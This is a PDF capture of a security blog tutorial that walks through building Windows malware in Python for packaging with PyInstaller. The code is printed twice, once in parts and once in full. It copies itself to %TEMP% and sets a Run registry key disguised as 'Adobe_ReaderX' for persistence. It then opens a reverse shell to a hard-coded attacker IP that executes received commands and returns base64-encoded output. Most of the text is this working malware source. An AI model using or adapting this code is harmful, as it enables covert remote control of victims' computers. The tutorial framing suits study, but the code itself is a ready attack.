8/19/2019 0xC Python Tutorial_ Python Malware

1/8

This tutorial demonstrates some proof of  concepts for creating malware using Python and PyInstaller. In a previous tutorial we

demonstrated how to compile a Python script as a Portable Executable(PE) using PyInstaller.  Now lets demonstrate some quick

proof of concept code to do some malicious actions on a Windows host.

Coding the Malware:

H o me Bl o g T a lk s T u t o r i a l s P od c a s t R e v ie w s Ab o u t U s

http://www.primalsecurity.net/http://www.primalsecurity.net/primalsec-blog/http://www.primalsecurity.net/talks/http://www.primalsecurity.net/tutorials/http://www.primalsecurity.net/podcasts/http://www.primalsecurity.net/course-reviews/http://www.primalsecurity.net/about/http://www.primalsecurity.net/about/http://www.primalsecurity.net/course-reviews/http://www.primalsecurity.net/podcasts/http://www.primalsecurity.net/tutorials/http://www.primalsecurity.net/talks/http://www.primalsecurity.net/primalsec-blog/http://www.primalsecurity.net/http://www.primalsecurity.net/http://www.primalsecurity.net/0x4-python-tutorial-exe/http://i2.wp.com/www.primalsecurity.net/wp-content/uploads/2014/08/Malware.jpg

8/19/2019 0xC Python Tutorial_ Python Malware

2/8

One of the most common things you’ll find with malware is it wanting to gain persistence on the victim. There are loads of ways to

achieve persistence on Windows, one of the more common being to modify the following registry key:

“Software\Microsoft\Windows\CurrentVersion\Run”. Below is a quick screenshot of the Python code to copy the program to the

%TEMP% directory and then make a registry modification so this code will execute when a user logs into the computer:

Now that we have copied this file over to the %TEMP% directory, and setup persistence we can execute the next portion of the

code, the reverse shell. I leveraged a Python reverse shell released by TrustedSec and made one modification — Base64 encode the

123456789

1011121314151617181920212223

2425262728

import sys, base64, os, socket, subprocessfrom _winreg import * def autorun(tempdir, fileName, run):# Copy executable to %TEMP%:  os.system('copy %s %s'%(fileName, tempdir)) # Queries Windows registry for key values# Appends autorun key to runkey array  key = OpenKey(HKEY_LOCAL_MACHINE, run)  runkey =[]  try:  i = 0  while True:  subkey = EnumValue(key, i)  runkey.append(subkey[0])  i += 1  except WindowsError:  pass # Set autorun key:  if 'Adobe ReaderX' not in runkey:  try:

  key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)  SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")  key.Close()  except WindowsError:  pass

https://www.trustedsec.com/files/RevShell_PoC_v1.py

8/19/2019 0xC Python Tutorial_ Python Malware

3/8

network traffic:

Now when this program executes it will open up a reverse shell back to the “attacker” which in this case is a hard coded IP in the

script, but it could easily be domain, or maybe something in the Amazon cloud. Below is a quick screen shot demonstrating theprogram executing on a Windows host and connecting back to the attacker. You can notice the network traffic is base64 encoded:

123456789

1011121314151617

18192021222324

def shell():#Base64 encoded reverse shell  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect(('192.168.56.1', int(443)))  s.send('[*] Connection Established!')  while 1:  data = s.recv(1024)  if data == "quit": break  proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=s  stdout_value = proc.stdout.read() + proc.stderr.read()  encoded = base64.b64encode(stdout_value)  s.send(encoded)  #s.send(stdout_value)  s.close() def main():  tempdir = '%TEMP%'

  fileName = sys.argv[0]  run = "Software\Microsoft\Windows\CurrentVersion\Run"  autorun(tempdir, fileName, run)  shell() if __name__ == "__main__":  main()

8/19/2019 0xC Python Tutorial_ Python Malware

4/8

Here is the full code:

123456

import sys, base64, os, socket, subprocessfrom _winreg import * def autorun(tempdir, fileName, run):# Copy executable to %TEMP%:  os.system('copy %s %s'%(fileName, tempdir))

 

8/19/2019 0xC Python Tutorial_ Python Malware

5/8

789

101112131415

1617181920212223242526

272829303132333435363738

39404142434445464748

 # Queries Windows registry for the autorun key value# Stores the key values in runkey array  key = OpenKey(HKEY_LOCAL_MACHINE, run)  runkey =[]  try:  i = 0  while True:  subkey = EnumValue(key, i)

  runkey.append(subkey[0])  i += 1  except WindowsError:  pass # If the autorun key "Adobe ReaderX" isn't set this will set the key:  if 'Adobe ReaderX' not in runkey:  try:  key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)  SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")  key.Close()

  except WindowsError:  pass def shell():#Base64 encoded reverse shell  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect(('192.168.56.1', int(443)))  s.send('[*] Connection Established!')  while 1:  data = s.recv(1024)  if data == "quit": break  proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=s

  stdout_value = proc.stdout.read() + proc.stderr.read()  encoded = base64.b64encode(stdout_value)  s.send(encoded)  #s.send(stdout_value)  s.close() def main():  tempdir = '%TEMP%'  fileName = sys.argv[0]  run = "Software\Microsoft\Windows\CurrentVersion\Run" 

8/19/2019 0xC Python Tutorial_ Python Malware

6/8

 

Share this

Share This Story, Choose Your Platform!    

4950515253

  autorun(tempdir, fileName, run)  shell() if __name__ == "__main__":  main()

6K+

 

Related

BACK TO THE SOURCE CODE -

Forward/Reverse Engineering Python

Malware

0x4 Python Tutorial: Python to EXE CTF Scripts and PyInstaller (.py > .exe)

http://www.primalsecurity.net/ctf-scripts-and-pyinstaller-py-exe/http://www.primalsecurity.net/0x4-python-tutorial-exe/http://www.primalsecurity.net/back-to-the-source-code-forwardingreverse-engineering-python-malware/http://www.primalsecurity.net/0xc-python-tutorial-python-malware/?share=google-plus-1&nb=1http://www.primalsecurity.net/0xc-python-tutorial-python-malware/?share=facebook&nb=1http://www.primalsecurity.net/0xc-python-tutorial-python-malware/?share=twitter&nb=1http://vkontakte.ru/share.php?url=http%3A%2F%2Fwww.primalsecurity.net%2F0xc-python-tutorial-python-malware%2F&title=0xC%20Python%20Tutorial%3A%20Python%20Malware&description=This%20tutorial%20demonstrates%20some%20proof%20of%20concepts%20for%20creating%20malware%20using%20Python%20and%20PyInstaller.%C2%A0%20In%20a%20previous%20tutorial%20we%20demonstrated%20how%20to%20compile%20a%20Python%20script%20as%20a%20Portable%20Executable%28PE%29%20using%20PyInstaller.%C2%A0%20Now%20lets%20demonstrate%20some%20quick%20proof%20of%20concept%20code%20to%20dohttps://plus.google.com/share?url=http://www.primalsecurity.net/0xc-python-tutorial-python-malware/http://pinterest.com/pin/create/button/?url=http%3A%2F%2Fwww.primalsecurity.net%2F0xc-python-tutorial-python-malware%2F&description=This%20tutorial%20demonstrates%20some%20proof%20of%20concepts%20for%20creating%20malware%20using%20Python%20and%20PyInstaller.%C2%A0%20In%20a%20previous%20tutorial%20we%20demonstrated%20how%20to%20compile%20a%20Python%20script%20as%20a%20Portable%20Executable%28PE%29%20using%20PyInstaller.%C2%A0%20Now%20lets%20demonstrate%20some%20quick%20proof%20of%20concept%20code%20to%20do&media=https://twitter.com/share?text=0xC%20Python%20Tutorial%3A%20Python%20Malware&url=http%3A%2F%2Fwww.primalsecurity.net%2F0xc-python-tutorial-python-malware%2Fhttp://www.facebook.com/sharer.php?m2w&s=100&p[url]=http://www.primalsecurity.net/0xc-python-tutorial-python-malware/&p[images][0]=&p[title]=0xC%20Python%20Tutorial%3A%20Python%20Malware

8/19/2019 0xC Python Tutorial_ Python Malware

7/8

Related Posts

 Whopper Web Shellune 2nd, 2015 | 0 Comments

0x5: Introduction to Penetration TestingFebruary 7th, 2015 | 0 Comments

Introduction toProfessionals January 10th, 2015 | 0 C

Copyright 2012-2016 Primal Security | All Rights Reserved | Powered by Coffee

https://www.youtube.com/channel/UCyywmyuCd8CSR1i1F7Rqqyghttps://twitter.com/primalsechttp://www.primalsecurity.net/introduction-to-python-for-security-professionals/#respondhttp://www.primalsecurity.net/introduction-to-python-for-security-professionals/http://www.primalsecurity.net/0x5-introduction-to-penetration-testing/#respondhttp://www.primalsecurity.net/0x5-introduction-to-penetration-testing/http://www.primalsecurity.net/whopper-web-shell/#respondhttp://www.primalsecurity.net/whopper-web-shell/

8/19/2019 0xC Python Tutorial_ Python Malware

8/8